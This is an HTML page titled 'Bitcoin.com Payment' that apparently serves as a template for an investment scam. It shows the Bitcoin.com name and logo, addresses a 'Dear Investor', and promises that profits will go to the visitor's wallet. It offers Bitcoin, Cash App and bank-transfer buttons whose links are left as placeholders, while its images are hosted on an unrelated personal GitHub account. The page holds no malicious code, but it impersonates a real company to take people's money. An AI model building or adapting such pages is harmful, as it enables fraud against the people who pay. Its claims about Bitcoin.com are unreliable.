<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Bitcoin.com Payment</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
      box-sizing: border-box;
      background-color: #f8f8f8;
      display: flex;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      min-height: 100vh;
    }

    header {
      text-align: center;
      padding: 20px;
      background-color: #f8f8f8;
      margin-top: 10px;
    }

    .logo {
            display: inline-block;
            margin: 20px;
        }

    #editable-text {
      font-size: 25px;
      font-weight: bold;
      margin: 20px 0;
      padding: 5px;
      background-color: #f8f8f8;
    }
    #editable-text2 {
      font-size: 16px;
      text-align: center;
      font-weight: normal;
      margin: 20px 0;
      padding: 5px;
      background-color: #f8f8f8;
    }

    .container1 {
      margin: 20px;
      width: 200px;
      padding: 15px;
      background-color: #e8d741; /* Container 1 background color */
      border-radius: 20px;
      cursor: pointer;
      display: flex;
      align-items: center;
    }

    .container2 {
      margin: 20px;
      width: 200px;
      padding: 15px;
      background-color: #4bf55a; /* Container 2 background color */
      border-radius: 20px;
      cursor: pointer;
      display: flex;
      align-items: center;
    }

    .container3 {
      margin: 20px;
      width: 200px;
      padding: 15px;
      background-color: #e5e5e5; /* Container 3 background color */
      border-radius: 20px;
      cursor: pointer;
      display: flex;
      align-items: center;
    }

    .container img {
      width: 50px; /* Adjust as needed */
      height: auto;
      margin-right: 10px;
    }

    .copyright {
      text-align: center;
      padding: 10px;
      background-color: #f8f8f8;
    }
  </style>
</head>
<body>

    <div class="logo">
        <img src="https://raw.githubusercontent.com/babayaga56/logo/32b4389c734311c2cf1bf0ee603e7c5d54c0877b/favicon-32x32.png" alt="" width="50">
        <span>Bitcoin.com</span>
    </div>
    

  <div id="editable-text" contenteditable="false">
    Select your Payment Method
  </div>
  <div id="editable-text2" contenteditable="false">
    Dear Investor, note that your investment funds will be sent directly to Bitcoin.com and updates on your investment will be sent to your email address and your profits will be sent directly to your Bitcoin Wallet.
 </div>


  <div class="container1" onclick="window.location.href='YOUR_CONTAINER1_LINK';">
    <img src="https://raw.githubusercontent.com/babayaga56/gtyt/c6763696e508c5536fc871f32058090c422153b7/btc.png" alt="">
    <span>Bitcoin</span>
  </div>

  <div class="container2" onclick="window.location.href='YOUR_CONTAINER2_LINK';">
    <img src="https://raw.githubusercontent.com/babayaga56/bol/f6c38f49ff25c0243cf38d5185401b7d099d67fc/cashapp.png" alt="">
    <span>Cash App</span>
  </div>

  <div class="container3" onclick="window.location.href='YOUR_CONTAINER3_LINK';">
    <img src="https://raw.githubusercontent.com/babayaga56/bank/8d1c908e76840e87d440a010f9550a29a85b2480/make-payment.png" alt="">
    <span>Bank Transfer</span>
  </div>

  <div class="copyright">
    <p>© 2024 Saint Bitts LLC<br>
    Bitcoin.com<br>
    All rights reserved.<br>
    <a>support@bitcoin.com</a></p>
  </div>

</body>
</html>
